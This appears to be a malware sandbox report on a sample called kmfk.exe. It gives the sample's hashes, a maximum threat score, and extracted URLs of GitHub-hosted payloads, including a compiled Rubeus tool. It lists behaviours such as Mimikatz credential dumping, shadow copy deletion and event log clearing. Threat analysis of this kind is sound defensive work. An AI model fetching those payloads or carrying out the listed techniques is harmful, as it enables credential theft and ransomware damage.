General
-
Target
kmfk.exe
-
Size
5.2MB
-
Sample
240502-nmnkbsaa59
-
MD5
7b94d09d7a163ea69ac507a86c1c69e8
-
SHA1
1fef4329b5a9ca9a037e9b1f7715f020dc955f40
-
SHA256
c690a152cb4f33da1c1d408089460cbccdf3dff520f2a93d403f15af6df6cc8f
-
SHA512
1027b042f70ef0dcff83af0a07ce4e72b835ba62d2ae9d3a6d6578ba306689017e1b4065b160ed295273e8311cb5ade4789db8deaec1da65c3b832a3c8debedb
-
SSDEEP
49152:MFtkoue3u4BfCwyls7ZRqTHquk3OcIA5EuLg0UC0GSJVnS7dErDb:M3jH+40wjqTHqJEQbgVSCDb
Malware Config
Extracted
https://github.com/anebgqa/d/releases/download/d/mz.exe
Extracted
https://github.com/anebgqa/c/releases/download/c/ps.exe
Extracted
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Extracted
https://github.com/anebgqa/e/releases/download/e/kln.exe
Targets
-
-
Target
kmfk.exe
-
Size
5.2MB
-
MD5
7b94d09d7a163ea69ac507a86c1c69e8
-
SHA1
1fef4329b5a9ca9a037e9b1f7715f020dc955f40
-
SHA256
c690a152cb4f33da1c1d408089460cbccdf3dff520f2a93d403f15af6df6cc8f
-
SHA512
1027b042f70ef0dcff83af0a07ce4e72b835ba62d2ae9d3a6d6578ba306689017e1b4065b160ed295273e8311cb5ade4789db8deaec1da65c3b832a3c8debedb
-
SSDEEP
49152:MFtkoue3u4BfCwyls7ZRqTHquk3OcIA5EuLg0UC0GSJVnS7dErDb:M3jH+40wjqTHqJEQbgVSCDb
Score10/10-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Clears Windows event logs
-
Deletes shadow copies
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit
-
mimikatz is an open source tool to dump credentials on Windows
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Modifies Windows Firewall
-
Executes dropped EXE
-
Drops desktop.ini file(s)
-
Legitimate hosting services abused for malware hosting/C2
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Windows Management Instrumentation
1